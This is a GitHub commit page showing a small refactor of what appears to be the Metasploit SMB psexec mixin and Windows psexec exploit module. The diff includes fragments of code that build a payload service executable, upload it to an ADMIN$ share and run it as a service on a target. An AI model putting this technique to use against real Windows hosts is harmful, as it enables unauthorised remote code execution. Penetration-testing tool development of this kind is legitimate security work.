Skip to content

Commit

Permalink
Browse files Browse the repository at this point in the history
rebase to use the mixin psexec
  • Loading branch information
agix committed May 13, 2014
1 parent d3f2414 commit 1a3b319
Show file tree
Hide file tree
Showing 2 changed files with 2 additions and 6 deletions.
1 change: 0 additions & 1 deletion lib/msf/core/exploit/smb/psexec.rb
Expand Up @@ -72,7 +72,6 @@ def psexec(command, disconnect=true, service_description=nil, service_name=nil,
end
servicename = service_name || Rex::Text.rand_text_alpha(11)
displayname = display_name || Rex::Text.rand_text_alpha(16)
servicedescription = service_description || Rex::Text.rand_text_alpha(rand(32)+1)

svc_handle = nil
svc_status = nil
Expand Down
7 changes: 2 additions & 5 deletions modules/exploits/windows/smb/psexec.rb
Expand Up @@ -155,7 +155,7 @@ def exploit
simple.disconnect("ADMIN$")
else
servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
servicedescription = datastore['SERVICE_DESCRIPTION'] || rand_text_alpha(rand(32)+1)
servicedescription = datastore['SERVICE_DESCRIPTION']
displayname = datastore['SERVICE_DISPLAYNAME'] || 'M' + rand_text_alpha(rand(32)+1)

# Upload the shellcode to a file
Expand All @@ -179,9 +179,6 @@ def exploit
end
exe = ''
opts = { :servicename => servicename }
if (datastore['PAYLOAD'].include? 'x64')
opts.merge!({ :arch => ARCH_X64 })
end
exe = generate_payload_exe_service(opts)

fd << exe
Expand All @@ -205,7 +202,7 @@ def exploit
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
end

psexec(file_location, false, servicedescription)
psexec(file_location, false, servicedescription, servicename, displayname)

print_status("Deleting \\#{filename}...")
sleep(1)
Expand Down

0 comments on commit 1a3b319

Please sign in to comment.